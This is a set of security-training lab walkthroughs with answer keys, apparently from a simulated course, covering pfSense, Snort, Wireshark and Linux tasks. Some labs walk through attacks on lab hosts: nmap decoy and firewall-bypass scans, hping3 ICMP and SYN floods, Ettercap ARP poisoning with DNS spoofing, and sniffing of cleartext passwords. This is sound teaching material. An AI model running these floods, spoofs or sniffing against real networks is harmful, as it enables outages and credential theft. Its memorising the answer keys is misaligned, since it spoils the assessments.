  Have a maximum log file size of 250,000 bytes.
Enable and configure remote system logging using the following instructions:
  Save the log files on CorpServer (192.168.0.10).
  Only forward system and firewall events.
Answer the questions.

1. Sign in to the pfSense Management console.
  a. In the Username field, enter admin.
  b. In the Password field, enter P@ssw0rd (zero).
  c. Select SIGN IN or press Enter.
2. Access the system log settings.
  a. From the pfSense menu bar, select Status > System Logs.
  b. In the top right, select Answer Questions.
  c. Answer Question 1.
3. Configure the general logging options.
  a. Under the Status breadcrumb, select Settings.
  b. Set the GUI Log Entries field to 25 to show only 25 logs at a time in the GUI.
  c. Set the Log file size field to 250000 bytes (250 KB) to set the maximum size of each log file.
4. Configure remote logging.
  a. Scroll to the bottom and, under Remote Logging Options, select Enable Remote Logging.
  b. Make sure the options are set as follows:
    - Source address: Default (any)
    - IP protocol: IPv4
    - Remote log servers: 192.168.0.10
  c. For Remote Syslog Contents, select the following:
    - System Events
    - Firewall Events
  d. Select Save.
5. View the results of the changes made to the number of logs shown.
  a. Under the Status breadcrumb, select System.
  b. Answer Question 2.
  c. Select Score Lab.
1- 50 2- 25

You work as the IT security administrator for a small corporate network. You recently placed a web server in the demilitarized zone (DMZ). You need to configure the perimeter firewall on the network security appliance (pfSense) to allow access from the WAN to the Web server in the DMZ using both HTTP and HTTPS. You also want to allow all traffic from the LAN network to the DMZ network. In this lab, your task is to:
Access the pfSense management console:
  Username: admin
  Password: P@ssw0rd (zero)
Create and configure a firewall rule to pass HTTP traffic from the WAN to the Web server in the DMZ.
Create and configure a firewall rule to pass HTTPS traffic from the WAN to the Web server in the DMZ.
Use the following settings (Parameter: Setting) when creating the HTTP and HTTPS firewall rules:
  Source: WAN network
  Destination port/service: HTTP (80), HTTPS (443)
  Destination: A single host
  IP address for host: 172.16.1.5
  Descriptions: For HTTP: HTTP from WAN to DMZ; For HTTPS: HTTPS from WAN to DMZ
Create and configure a firewall rule to pass all traffic from the LAN network to the DMZ network. Use the description LAN to DMZ Any.

1. Sign in to the pfSense management console.
  a. In the Username field, enter admin.
  b. In the Password field, enter P@ssw0rd (zero).
  c. Select SIGN IN or press Enter.
2. Create and configure a firewall rule to pass HTTP traffic from the WAN to the Web server in the DMZ.
  a. From the pfSense menu bar, select Firewall > Rules.
  b. Under the Firewall breadcrumb, select DMZ.
  c. Select Add (either one).
  d. Make sure Action is set to Pass.
  e. Under Source, use the drop-down to select WAN net.
  f. Under Destination, use the Destination drop-down to select Single host or alias.
  g. In the Destination Address field, enter 172.16.1.5.
  h. Using the Destination Port Range drop-down, select HTTP (80).
  i. Under Extra Options, in the Description field, enter HTTP from WAN to DMZ.
  j. Select Save.
  k. Select Apply Changes.
3. Create and configure a firewall rule to pass HTTPS traffic from the WAN to the Web server in the DMZ.
  a. For the rule just created, select the Copy icon (two files).
  b. Under Destination, change the Destination Port Range to HTTPS (443).
  c. Under Extra Options, change the Description field to HTTPS from WAN to DMZ.
  d. Select Save.
  e. Select Apply Changes.
4. Create and configure a firewall rule to pass all traffic from the LAN network to the DMZ network.
  a. Select Add (either one).
  b. Make sure Action is set to Pass.
  c. For Protocol, use the drop-down to select Any.
  d. Under Source, use the drop-down to select LAN net.
  e. Under Destination, use the drop-down to select DMZ net.
  f. Under Extra Options, change the Description field to LAN to DMZ Any.
  g. Select Save.
  h. Select Apply Changes.

You are the security analyst for a small corporate network. In an effort to protect your network against security threats and hackers, you have added Snort to pfSense. With Snort already installed, you need to configure rules and settings and then assign Snort to the desired interface. In this lab, your task is to use pfSense's Snort to complete the following:
Sign into pfSense using the following:
  Username: admin
  Password: P@ssw0rd (zero)
Download the:
  Snort free registered User rules (Oinkmaster Code: 992acca37a4dbd7)
  Snort GPLv2 Community rules
  Emerging Threats Open rules
  Sourcefire OpenAppID detectors
  APPID Open rules
Configure rule updates to happen every 4 days at 12:10 a.m. Hide any deprecated rules.
Block offending hosts for 1 day.
Send all alerts to the system log when Snort starts and stops.
Assign Snort to the WAN interface using a description of Snort-WAN. Include:
  Sending alerts to the system log
  Automatically blocking hosts that generate a Snort alert
Start Snort on the WAN interface.

1. Sign into the pfSense management console.
  a. In the Username field, enter admin.
  b. In the Password field, enter P@ssw0rd (zero).
  c. Select SIGN IN or press Enter.
2. Access the Snort Global Settings.
  a. From the pfSense menu bar, select Services > Snort.
  b. Under the Services breadcrumb, select Global Settings.
3. Configure the required rules to be downloaded.
  a. Select Enable Snort VRT.
  b. In the Snort Oinkmaster Code field, enter 992acca37a4dbd7. You can copy and paste this from the scenario.
  c. Select Enable Snort GPLv2.
  d. Select Enable ET Open.
4. Configure the Sourcefire OpenAppID Detectors to be downloaded.
  a. Under Sourcefire OpenAppID Detectors, select Enable OpenAppID.
  b. Select Enable RULES OpenAppID.
5. Configure when and how often the rules will be updated.
  a. Under Rules Update Settings, use the Update Interval drop-down to select 4 DAYS.
  b. For Update Start Time, change to 12:10.
  c. Select Hide Deprecated Rules Categories.
6. Configure Snort General Settings.
  a. Under General Settings, use the Remove Blocked Hosts Interval drop-down to select 1 Day.
  b. Select Startup/Shutdown Logging.
  c. Select Save.
7. Configure the Snort Interface settings for the WAN interface.
  a. Under the Services breadcrumb, select Snort Interfaces and then select Add.
  b. Under General Settings, make sure Enable interface is selected.
  c. For Interface, use the drop-down to select WAN (CorpNet_pfSense_L port 1).
  d. For Description, use Snort-WAN.
  e. Under Alert Settings, select Send Alerts to System Log.
  f. Select Block Offenders.
  g. Scroll to the bottom and select Save.
8. Start Snort on the WAN interface.
  a. Under the Snort Status column, select the arrow.
  b. Wait for a checkmark to appear, indicating that Snort was started successfully.

You are the security analyst for a small corporate network. You want to make sure that guests visiting your company have limited access to the internet. You have chosen to use pfSense's captive portal feature. Guests must pass through this portal to access the internet. In this lab, your task is to:
Access the pfSense management console:
  Username: admin
  Password: P@ssw0rd (zero)
Add a captive portal zone named WiFi-Guest. Use the description Guest wireless access zone.
Using the GuestWi-Fi interface, configure your portal as follows:
  Allow a maximum of 50 concurrent connections.
  Disconnect users from the internet if their connection is inactive for 15 minutes.
  Disconnect users from the internet after 45 minutes regardless of their activity.
  Limit users' downloads and uploads to 7000 and 2400 Kbit/s, respectively.
  Force users to pass through your portal prior to authentication.
Allow the following MAC and IP address to pass through the portal:
  MAC: 00:00:1C:11:22:33
  IP: 198.28.1.100/16
  Give the IP address the description of Security analyst's laptop.

1. Sign into the pfSense management console.
  a. In the Username field, enter admin.
  b. In the Password field, enter P@ssw0rd (zero).
  c. Select SIGN IN or press Enter.
2. Add a captive portal zone.
  a. From the pfSense menu bar, select Services > Captive Portal.
  b. Select Add.
  c. For Zone name, enter WiFi-Guest.
  d. For Zone description, enter Guest wireless access zone.
  e. Select Save & Continue.
3. Enable and configure the captive portal.
  a. Under Captive Portal Configuration, select Enable.
  b. For Interfaces, select GuestWi-Fi.
  c. For Maximum concurrent connections, select 50.
  d. For Idle timeout, enter 15.
  e. For Hard timeout, enter 45.
  f. Scroll down and select Per-user bandwidth restriction.
  g. For Default download (Kbit/s), enter 7000.
  h. For Default upload (Kbit/s), enter 2400.
  i. Under Authentication, use the drop-down menu to select None, don't authenticate users.
  j. Scroll to the bottom and select Save.
4. Allow a MAC address to pass through the portal.
  a. From the Captive Portal page, select the Edit Zone icon (pencil).
  b. Under the Services breadcrumb, select MACs.
  c. Select Add.
  d. Make sure the Action field is set to Pass.
  e. For Mac Address, enter 00:00:1C:11:22:33.
  f. Select Save.
5. Allow an IP address to pass through the portal.
  a. Under the Services breadcrumb, select Allowed IP Addresses.
  b. Select Add.
  c. For IP Address, enter 198.28.1.100.
  d. Use the IP address drop-down menu to select 16. This sets the subnet mask to 255.255.0.0.
  e. For the Description field, enter Security analyst's laptop.
  f. Make sure Direction is set to Both.
  g. Select Save.

You are the security analyst for a small corporate network. After monitoring your network, you have discovered that several employees are wasting time visiting non-productive and potentially malicious websites. As such, you have added pfBlockerNG to your pfSense device. You now need to configure this feature and add the required firewall rules that allow/block specific URLs and prevent all DNS traffic from leaving your LAN network. In this lab, your task is to:
Sign in to pfSense using:
  Username: admin
  Password: P@ssw0rd (zero)
Create a firewall rule that blocks all DNS traffic leaving the LAN network.
Create a firewall rule that allows all DNS traffic going to the LAN network.
Use the following settings (Parameter: Setting) for the two rules:
  Protocol: UDP (53)
  Descriptions: For the block rule: Block DNS from LAN; For the allow rule: Allow all DNS to LAN
Arrange the firewall rules in the order that allows them to function properly.
Enable and configure pfBlockerNG using the following settings (Parameter: Setting):
  DNSBL Virtual IP: 192.168.0.0
  Top-Level Domain (TLD) Blacklist: instagram.com, netflix.com, googleanalytics.net
  Top-Level Domain (TLD) Whitelist: .www.google.com, .play.google.com, .drive.google.com

1. Sign into the pfSense management console.
  a. In the Username field, enter admin.
  b. In the Password field, enter P@ssw0rd (zero).
  c. Select SIGN IN or press Enter.
2. Create a firewall rule that blocks all DNS traffic leaving the LAN network.
  a. From the pfSense menu bar, select Firewall > Rules.
  b. Under the Firewall breadcrumb, select LAN.
  c. Select Add (either one).
  d. Under Edit Firewall Rule, use the Action drop-down to select Block.
  e. Under Edit Firewall Rule, set Protocol to UDP.
  f. Under Source, use the drop-down menu to select LAN net.
  g. Under Destination, configure the Destination Port Range to use DNS (53) (for From and To).
  h. Under Extra Options, in the Description field, enter Block DNS from LAN.
  i. Select Save.
  j. Select Apply Changes.
3. Create a firewall rule that allows all DNS traffic going to the LAN network.
  a. Select Add (either one).
  b. Under Edit Firewall Rule, make sure Action is set to Pass.
  c. Under Edit Firewall Rule, set Protocol to UDP.
  d. Under Destination, use the drop-down menu to select LAN net.
  e. Configure the Destination Port Range to use DNS (53) (for From and To).
  f. Under Extra Options, in the Description field, enter Allow all DNS to LAN.
  g. Select Save.
  h. Select Apply Changes.
4. Arrange the firewall rules in the order that allows them to function properly.
  a. Using drag-and-drop, move the rules to the following order (top to bottom):
    - Anti-Lockout Rule
    - Allow all DNS to LAN
    - Block DNS from LAN
    In the simulated version of pfSense, you can only drag and drop the rules you created. You cannot drag and drop the default rule.
  b. Select Save.
  c. Select Apply Changes.
5. Enable pfBlockerNG.
  a. From the pfSense menu bar, select Firewall > pfBlockerNG.
  b. Under General Settings, select Enable pfBlockerNG.
  c. Scroll to the bottom and select Save.
6. Enable and configure DNS block lists.
  a. Under the Firewall breadcrumb, select DNSBL.
  b. Select Enable DNSBL.
  c. For DNSBL Virtual IP, enter 192.168.0.0.
  d. Scroll to the bottom and expand TLD Blacklist.
  e. Enter the following URLs in the TLD Blacklist box:
    - instagram.com
    - netflix.com
    - googleanalytics.net
  f. Expand TLD Whitelist and then enter the following URLs:
    - .www.google.com
    - .play.google.com
    - .drive.google.com
  g. Select Save.

You are the security analyst for a small corporate network. You want to run a test to see if you can avoid being detected by the intrusion detection systems. You have decided to use Nmap to perform a decoy scan on CorpNet.local. In this lab, your task is to perform a decoy scan on CorpNet.local:
Use Zenmap or Terminal to run the scan.
Use Wireshark to capture the scan.
  Interface: enp2s0
  Number of random IP addresses: 5
  IP address to target: 192.168.0.10
Answer the question.

1. Start a Wireshark capture for the enp2s0 interface.
   a. From the Favorites bar, select Wireshark.
   b. Under Capture, select enp2s0.
   c. From the upper-left menu, select the blue fin to start the capture.
2. Run nmap (from Terminal or Zenmap) to disguise the source IP address.
   a. From Zenmap:
   b. From the Favorites bar, select Zenmap.
   c. In the Command field, type nmap -D RND:5 192.168.0.10
   d. Select Scan.
   e. As soon as Nmap completes, immediately stop Wireshark by selecting the red box.
   f. From Terminal:
   g. From the Favorites bar, select Terminal.
   h. At the prompt, type nmap -D RND:5 192.168.0.10 and press Enter.
   i. As soon as Nmap completes, immediately stop Wireshark by selecting the red box.
3. Analyze the Wireshark data.
   a. Maximize the Wireshark window for easier viewing.
   b. From Wireshark, scroll through the results until you see 192.168.0.10 in the Destination column.
   c. Under Source, view the different IP addresses used to disguise the scan.
   d. In the top right, select Answer Questions.
   e. Answer the question.
   f. Select Score Lab.
1- 192.168.0.47

While working on your Linux server, you want to practice starting, stopping, and restarting a service using the systemctl command. In this lab, your task is to:
§ Use the systemctl command to start bluetooth.service.
§ Use the systemctl command to stop bluetooth.service.
§ Use the systemctl command to restart bluetooth.service.

1. Start the Bluetooth service using the systemctl command.
   a. From the Favorites bar, select Terminal.
   b. At the prompt, type systemctl start bluetooth.service and then press Enter.
   c. Type systemctl is-active bluetooth.service to verify that the service is active.
2. Stop the Bluetooth service using the systemctl command.
   a. At the prompt, type systemctl stop bluetooth.service and then press Enter.
   b. Type systemctl is-active bluetooth.service to verify that the service is no longer active.
3. Restart the Bluetooth service using the systemctl command.
   a. At the prompt, type systemctl restart bluetooth.service and then press Enter.
   b. Type systemctl is-active bluetooth.service to verify that the service is active again.

You are the security analyst for a small corporate network. To achieve Payment Card Industry Data Security Standard (PCI DSS) certification, you are required to scan for rogue access points quarterly. In this lab, your task is to scan for rogue wireless access points from a terminal as follows:
§ Use airmon-ng to discover and enable the onboard wireless adapter.
§ Use airodump-ng to scan for wireless access points.
§ Answer the questions.

1. Start the wireless interface in monitor mode.
   a. From the Favorites bar, select Terminal.
   b. At the prompt, type airmon-ng and press Enter to view and find the name of the wireless adapter.
   c. Type airmon-ng start wlp1s0 and press Enter to put the adapter in monitor mode.
   d. Type airmon-ng and press Enter to view the new name of the wireless adapter.
2. Display a list of detected access points.
   a. Type airodump-ng wlp1s0mon and press Enter to scan for wireless access points.
   b. After a few seconds, press Ctrl + c to stop the scan.
   c. In the top right, select Answer Questions.
   d. Answer the questions.
   e. Select Score Lab.
1- GreatDonuts
2- -94
3- 10

You are the security analyst for a small corporate network. You are concerned about unauthorized activity in your DMZ. You have decided to set up a honeypot to study hacking attempts. In this lab, your task is to:
§ Create a honeypot on the computer named www_stage using Pentbox.
§ Using Google Chrome, test the honeypot on the computer named Marketing3 using the www_stage.corpnet.xyz URL.
§ Using the www_stage system, review the effects of the intrusion.
§ Answer the questions.

1. Use Pentbox to create a honeypot on www_stage.
   a. From the Favorites bar, select Terminal.
   b. At the prompt, type cd pentbox-1.8 and press Enter to change to the pentbox directory.
   c. Type ./pentbox.rb and press Enter to start Pentbox.
   d. Type 2 and press Enter to select Network Tools.
   e. Type 3 and press Enter to select Honeypot.
   f. Type 1 and press Enter to select Fast Auto Configuration.
2. From the Analyst-Lap computer, test the honeypot using Google Chrome.
   a. From the top navigation tabs, select Buildings.
   b. Under Building A, select Floor 2.
   c. Under Marketing Group B, select Marketing3.
   d. From the taskbar, select Google Chrome.
   e. In the URL field, enter www_stage.corpnet.xyz and press Enter.
   f. In the top right, select Answer Questions.
   g. Answer Question 1.
   h. Minimize the Lab Questions dialog.
3. Review the effects of the intrusion on www_stage.
   a. From the top navigation tabs, select Building A.
   b. Under Building A, select Basement.
   c. Under Basement, select www_stage. Notice the INTRUSION ATTEMPT DETECTED message at the bottom of the Pentbox window.
1- Access denied
2- 192.168.0.39

You are the security analyst for a small corporate network. To ensure that your corporate information is safe, you want to run a test to see if any clear text passwords are being exposed through an HTTP login request. In this lab, your task is to analyze HTTP POST packets as follows:
§ Use Wireshark to capture all packets on the enp2s0 interface.
§ Filter the captured packets to show only HTTP POST data.
§ Examine the packets captured to find clear text passwords.
§ Answer the questions.

1. Use Wireshark to capture all packets for a period of time.
   a. From the Favorites bar, select Wireshark.
   b. Under Capture, select enp2s0.
   c. Select the blue fin to begin a Wireshark capture.
   d. After a few seconds, select the red box to stop the Wireshark capture.
   e. Maximize Wireshark for easier viewing.
2. Filter and examine HTTP POST packets for clear text passwords.
   a. In the Apply a display filter field, type http.request.method==POST and press Enter to show the HTTP POST requests.
   b. From the middle pane, expand HTML Form URL Encoded for each packet.
   c. Examine the information shown to find clear text passwords.
   d. In the top right, select Answer Questions.
   e. Answer the questions.
   f. Select Score Lab.
1- 5
2- 192.168.10.193
3- slimycheese4me

Which of the following BEST describes a non-disclosure agreement policy?

A policy requiring a confidentiality contract in which employees agree to not divulge certain information for a specific length of time.

Which of the following BEST describes the data security policy of data sovereignty?

A policy that dictates that data is subject to the laws of the nation in which it was collected.

Which of the following BEST describes Central Policy?

A program that checks for the correct attributes in an attribute-based system.

Which of the following BEST describes a disassembler program?

A program that translates machine code into assembly language, or low-level language

You are the security analyst for a small corporate network, and you want to know how to find and recognize ICMP flood attacks so you can better defend against them. You know that you can do this using Wireshark and the hping3 packet generator. In this lab, your task is to create and examine the results of an ICMP flood attack as follows:
§ From Kali Linux, start a capture in Wireshark for the enp2s0 interface.
§ Ping CorpServer2 at 192.168.10.10.
§ Examine the ICMP packets captured.
§ Use hping3 to launch an ICMP flood attack against CorpServer2.
§ Examine the captured ICMP packets.
§ Answer the questions.

1. Use Wireshark to capture and analyze a ping to 192.168.10.10.
   a. From the Favorites bar, select Wireshark.
   b. Under Capture, select enp2s0.
   c. Select the blue fin to begin a Wireshark capture.
   d. From the Favorites bar, select Terminal.
   e. From the Terminal, type ping 192.168.10.10 and press Enter.
   f. After some data exchanges, press Ctrl + c to stop the ping process.
   g. From Wireshark, select the red box to stop the Wireshark capture.
   h. In the Apply a display filter field, type icmp and press Enter. Notice the number of packets captured and the time between each packet being sent.
2. Use Wireshark to capture and analyze an ICMP flood.
   a. Select the blue fin to begin a new Wireshark capture.
   b. From the Terminal, type hping3 --icmp --flood 192.168.10.10 and press Enter to start a ping flood against CorpServer2.
   c. From Wireshark, select the red box to stop the Wireshark capture. Notice the type, number of packets, and time between each packet being sent.
   d. From the Terminal, press Ctrl + c to stop the ICMP flood.
3. Answer the questions.
   a. In the top right, select Answer Questions.
   b. Answer the questions.
   c. Select Score Lab.
1- With the ICMP flood, the ICMP packets are sent more rapidly. With the flood, all packets come from the source.

You are the security analyst for a small corporate network. Several employees have reported that they are unable to connect to the network. They all seem to be getting bad IP address information from a rogue DHCP server. In this lab, your task is to identify the rogue DHCP server using Wireshark:
§ Use Wireshark to capture and filter DHCP traffic.
§ Disable and enable the enp2s0 network interface to request a new IP address from DHCP.
§ Find the rogue and legitimate DHCP servers.
§ Answer the questions.

1. Use Wireshark to capture and filter DHCP traffic.
   a. From the Favorites bar, select Wireshark.
   b. Under Capture, select enp2s0.
   c. Select the blue fin to begin a Wireshark capture.
   d. In the Apply a display filter field, type bootp and press Enter.
2. Disable and enable the enp2s0 network interface.
   a. From the Favorites bar, select Terminal.
   b. At the prompt, type ip addr show and press Enter to view the current IP configuration.
   c. Type ip link set enp2s0 down and press Enter.
   d. Type ip link set enp2s0 up and press Enter to enable the interface.
   e. In the top right, select Answer Questions.
1- 20.10.10.239
2- 192.168.0.14

You are the security analyst for a small corporate network. You have heard from many customers that they are unable to browse to your public-facing web server. You suspect that it might be under some sort of denial-of-service attack, possibly a TCP SYN flood attack. Your www_stage computer is on the same network segment as your web server, so you'll use this computer to investigate the problem. In this lab, your task is to:
§ Use Wireshark to capture packets and filter for packets with the SYN flag set. Filter for SYN packets with tcp.flags.syn==1 and tcp.flags.ack==0.
§ Use a filter to display only packets that have the SYN flag and the ACK flag set. Filter for SYN-ACK packets with tcp.flags.syn==1 and tcp.flags.ack==1.
§ Use a filter to only display packets that contain the ACK flag and answer the question. Filter for ACK packets with tcp.flags.syn==0 and tcp.flags.ack==1.
§ Answer the question.

1. Use Wireshark to capture packets and filter for packets with the SYN flag set.
   a. From the Favorites bar, select Wireshark.
   b. Under Capture, select enp2s0.
   c. From the menu, select the blue fin to begin the capture.
   d. In the Apply a display filter field, type tcp.flags.syn==1 and tcp.flags.ack==0 and press Enter to filter the Wireshark display to show packets with only the SYN flag. Notice that there is a flood of SYN packets being sent to 198.28.1.1 (www.corpnet.xyz).
2. Use a filter to display only packets that have the SYN flag and the ACK flag set.
   a. In the Apply a display filter field, change the ending of the tcp.flags.ack portion from a 0 to a 1 and press Enter to filter the Wireshark display to only those packets with both the SYN flag and ACK flag. You should notice that there are far fewer SYN-ACK packets than SYN packets. The server is so busy that it can't respond to all of the packets.
   b. Select the red square to stop the capture.
3. Use a filter to only display packets that contain the ACK flag and answer the question.
   a. In the Apply a display filter field, change the ending of the tcp.flags.syn portion from a 1 to a 0 and press Enter to filter the Wireshark display to packets with only the ACK flag. You should see ACK packets, but none of them are being sent to 198.28.1.1 (www.corpnet.xyz). In a SYN flood attack, the final ACK is never sent, which ties up the half-open connections on the server.
   b. In the top right, select Answer Questions.
   c. Answer the question.
   d. Select Score Lab.
1- There are multiple source addresses for the SYN packets with the destination address 198.28.1.1.

You work as a security analyst for a small corporate network. During an internal test, you find that VNC is being used on the network, which violates your company's security policies. It was installed to maintain access by a malicious employee. Run a scan using nmap to discover open ports on host machines to find out which host machines are using port 5900 for VNC. In this lab, your task is to complete the following:
§ Use Zenmap to scan for open ports running VNC.
§ Use the table below to help you identify the computer.
§ Go to the suspect computer and uninstall VNC.
§ From the suspect computer, run netstat -l to verify that the ports for VNC are closed.

1. Use Zenmap to scan for open ports running VNC.
   a. From the Favorites bar, select Zenmap.
   b. In the Command field, type nmap -p 5900 192.168.0.0/24.
   c. Select Scan.
   d. From the results, find the computer with port 5900 open.
2. Uninstall VNC from the suspect computer.
   a. From the top navigation tabs, select Floor 1 Overview.
   b. Under Support Office, select Support.
   c. From the Favorites bar, select Terminal.
   d. At the prompt, type netstat -l and press Enter to confirm the port is open on the machine.
   e. Type dnf list vnc and press Enter to find the package name.
   f. Type dnf erase libvncserver and press Enter.
   g. Press Y and press Enter to uninstall the package.
3. Type netstat -l and press Enter to confirm that the port has been closed on the machine.

You are the security analyst for a small corporate network. You are concerned with the safety of your company's firewalls. During some testing, you discovered a firewall with an IP address of 198.28.1.1. You have decided to do further testing from outside the network by scanning this firewall for potential weakness by running an nmap scan. In this lab, your task is to:
§ Run the firewall-bypass nmap script against the firewall.
§ Answer the question.

1. Use nmap to scan the network for potential weakness.
   a. From the Favorites bar, select Terminal.
   b. Type nmap --script=firewall-bypass 198.28.1.1 and press Enter.
2. Answer the questions.
   a. In the top right, select Answer Questions.
   b. Answer the questions.
   c. Select Score Lab.
1- VPN

Vulnerability scanning has its limitations. Which answer BEST describes the concept of point in time?

A scan can only obtain data for the period of time that it runs.

Which of the following BEST describes a network policy?

A set of conditions, constraints, and settings used to authorize which remote users and computers can or cannot connect to a network.

You are a cybersecurity analyst for a small corporate network. The CorpServer host server has several virtual guest servers running on it (see table). The IT team has been troubleshooting an issue and tells you that they can ping some of the servers but not others. They have asked you to troubleshoot why they can only ping certain servers. In this lab, your task is to use ping and hping3 to troubleshoot connectivity for the guest servers:
§ Use ping and hping3 to test connectivity to each server and note the results.

1. Use ping to test your connectivity to the servers in your network.
   a. From the Favorites bar, select Terminal.
   b. Type ping -c 3 <ip address or server name> and press Enter. Note the results.
   c. Repeat step b for each applicable server.
   d. In the top right, select Answer Questions.
   e. Answer Questions 1 and 2.
2. Use hping3 to test your connectivity to the servers that failed using the ping command.
   a. Type hping3 -c 3 -n <ip address or server name> and press Enter. Note the results.
   b. Repeat step a for each applicable server.
   c. Answer Question 3.
   d. Select Score Lab.
ANSWERS:
1- CorpFiles16 (192.168.0.12), CorpFiles (192.168.0.13), CorpWeb (192.168.0.15)
2- A firewall is blocking ICMP packets.
3- The hping3 command uses TCP packets by default.

You are the security analyst for your company. Through reconnaissance, it was found that a partner company website is broadcasting banner information. Your manager wants you to help them hide IIS banners. In this lab, your task is to configure the IIS web server to stop broadcasting banners by removing HTTP response headers from the partnercorp.xyz website.

1. Use the IIS Manager to access the PartnerCorp.xyz website.
   a. From Server Manager, select Tools > Internet Information Services (IIS) Manager.
   b. From the left pane, expand PartnerWeb(partnercorp.xyz\Administrator) Home.
   c. Expand Sites.
   d. Select partnercorp.xyz.
2. Remove all HTTP response headers.
   a. From the center pane, double-click HTTP Response Headers.
   b. Select a response header.
   c. Under Actions, select Remove.
   d. Select Yes to confirm.
   e. Repeat steps 2b-2d for the second response header.

As a security analyst, you often scan for any zombie processes that might be running on your computer. In this lab, your task is to:
§ Use the ps command to find all zombie processes.
§ Use the applicable ps options to:
   Show the processes for all users.
   Display the process's user/owner.
   Show the processes not attached to a terminal.
§ Kill all zombie processes found using kill -9.

1. Use the ps aux command to find any zombie processes running.
   a. From the Favorites bar, select Terminal.
   b. At the prompt, type ps aux | less and press Enter to view the list of processes.
   c. Use the Page Up/Page Down keys to find the processes with status Z.
   d. Type q to exit the process list and return to the prompt.
   e. In the top right, select Answer Questions.
   f. Answer Question 1.
2. Terminate the zombie processes.
   a. Type kill -9 1260 and press Enter.
   b. Type kill -9 1430 and press Enter.
   c. Type kill -9 2165 and press Enter.
   d. Select Score Lab.
Answer: 3

You are the security analyst for a small corporate network. You suspect that your Linux system may have been compromised. In this lab, your task is to:
§ Use the ps command to view and analyze the status of the Linux processes.
§ Answer the questions about the processes that may be indications of compromise.
§ Answer the questions.

1. Use the ps aux command to view the list of processes on your Linux system.
   a. From the Favorites bar, select Terminal.
   b. At the prompt, type ps aux | less and press Enter to view the list of processes.
1- 1194
2- Running
3- 3.0
4- Python

You are the security analyst for a small corporate network. You are concerned that several employees may still be using the unsecured FTP protocol against company policy. You have decided to run a test to see if FTP is being used. If any FTP packets are found, you need to determine information about who is using this protocol. In this lab, your task is to capture FTP packets as follows:
§ Use Wireshark to capture packets on the enp2s0 interface for five or more seconds.
§ Filter for FTP packets.
§ Answer the questions.

1. Using Wireshark, capture packets for five seconds.
   a. From the Favorites bar, select Wireshark.
   b. Under Capture, select enp2s0.
   c. Select the blue fin to begin a Wireshark capture.
   d. Capture packets for five seconds.
   e. Select the red box to stop the Wireshark capture.
   f. Maximize the window for easier viewing.
2. Apply the FTP filter and answer the questions.
   a. In the Apply a display filter field, type ftp and press Enter.
   b. In the top right, select Answer Questions.
   c. Answer the questions.
1- Guest
2- Fr33to@ll
3- SalesContacts.txt
4- 192.168.0.50

You are the security analyst for a small corporate network. You know that a denial of service attack (DoS attack) can make a machine or network resource unavailable to the employees in your company. These types of DoS attacks are often done by flooding the network with TCP SYN packets. To ensure that you are able to find and analyze a TCP SYN flood attack, you have decided to use the Linux tool named hping3 to simulate a SYN flood attack against your CorpTest server. In this lab, your task is to capture and analyze a TCP SYN flood attack as follows:
§ Use Wireshark to capture packets on the enp2s0 interface.
§ Using the Linux Terminal, ping CorpTest (192.168.10.19) to verify connectivity. Note the packets in Wireshark.
§ Set a display filter in Wireshark to show only TCP SYN packets.
§ Use hping3 to launch a SYN flood attack against CorpTest (192.168.10.19).
§ After capturing packets for a few seconds, examine a SYN packet with the destination address of 192.168.10.19.
§ Answer the question.

1. Using Wireshark, capture packets on the enp2s0 interface.
   a. From the Favorites bar, select Wireshark.
   b. Under Capture, select enp2s0.
   c. Select the blue fin to begin a Wireshark capture.
2. Using a Terminal, ping CorpTest (192.168.10.19).
   a. From the Favorites bar, select Terminal.
   b. At the prompt, type ping CorpTest (or 192.168.10.19) and press Enter.
   c. Note the packets captured in Wireshark.
   d. After a few seconds, press Ctrl-C to stop the ping.
3. Filter the packet capture to show only SYN packets, then start a SYN flood.
   a. In Wireshark's Apply a display filter field, type tcp.flags.syn==1 and press Enter.
   b. From the Terminal, type hping3 --syn --flood CorpTest (or 192.168.10.19) and press Enter to start a TCP SYN flood against the CorpTest server.
   c. After a few seconds of capturing packets, select the red box to stop the Wireshark capture.
1- 0x002

Which of the following BEST describes a relational database?

A storage bank for data that is organized in tables linked by keys and which can be searched in multiple ways through those keys.

Which of the following BEST describes a rainbow table?

A table of passwords and the computed matching hashes.

You are the security analyst for a small corporate network. In an effort to defend against DNS spoofing attacks, which are part of on-path (man-in-the-middle) attacks, you have decided to use Ettercap to initiate DNS spoofing in an attempt to analyze its effects on the RMK Office Supplies site. In this lab, your task is to:
§ View normal access to the RMK Office Supplies website: rmksupplies.com
§ Use Ettercap to:
   Begin unified sniffing on the enp2s0 interface.
   Set Exec (192.168.0.30) as the target machine.
   Add and enable DNS spoofing using an Ettercap plugin.
   Initiate ARP poisoning on remote connections.
§ From Exec, use Google Chrome to access rmksupplies.com and analyze the results.
§ Answer the question.

1. View normal access to the RMK Office Supplies website.
   a. From the taskbar of the Linux computer named Support, select Google Chrome.
   b. In the URL field, type rmksupplies.com and press Enter. Notice that you are taken to the RMK Office Supplies site.
   c. Close Google Chrome.
2. Use Ettercap to begin unified sniffing on the enp2s0 interface.
   a. From the Favorites bar, select Ettercap.
   b. Select Sniff > Unified sniffing.
   c. From the Network Interface drop-down list, select enp2s0.
   d. Select OK.
3. Set Exec (192.168.0.30) as the target machine.
   a. Select Hosts > Scan for hosts.
   b. Select Hosts > Host list.
   c. Under IP Address, select 192.168.0.30.
   d. Select Add to Target 1 to assign it as the target.
4. Initiate DNS spoofing using an Ettercap plugin.
   a. Select Plugins > Manage the plugins.
   b. Select the Plugins tab.
   c. Double-click dns_spoof to activate it.
5. Initiate ARP poisoning on remote connections.
   a. Select Mitm > ARP poisoning.
   b. Select Sniff remote connections.
   c. Select OK.
6. From Exec, access rmksupplies.com.
   a. From the top navigation tabs, select Floor 1 Overview.
   b. Under Executive Office, select Exec.
   c. From the taskbar, select Google Chrome.
   d. In the URL field, type rmksupplies.com and press Enter.
   e. In the top right, select Answer Questions.
   f. Answer the question.
   g. Select Score Lab.
1- Queries to the rmksupplies.com site were redirected to the RUS Office Supplies site.

You are the security analyst for a small corporate network. You just downloaded a new release of the ThreatProtec program, which you use to do your job. You need to make sure the file was not altered before you received it. To help do this, you also downloaded the ThreatProtec_hash.txt file, which contains the original file hash for the new release of the ThreatProtec program. The two files are located in C:\Downloads. In this lab, your task is to use MD5 hashes to confirm that the ThreatProtec.zip file was unaltered as follows:
§ Use Windows PowerShell to:
   Generate a file hash for ThreatProtec.zip.
   Extract the hash from ThreatProtec_hash.txt.
   Compare the two hashes using the applicable cmdlet to see if they match.
   You can highlight text in PowerShell and right-click it to copy the text to the active line.
§ Answer the question.

1. View the files in the C:\Downloads folder.
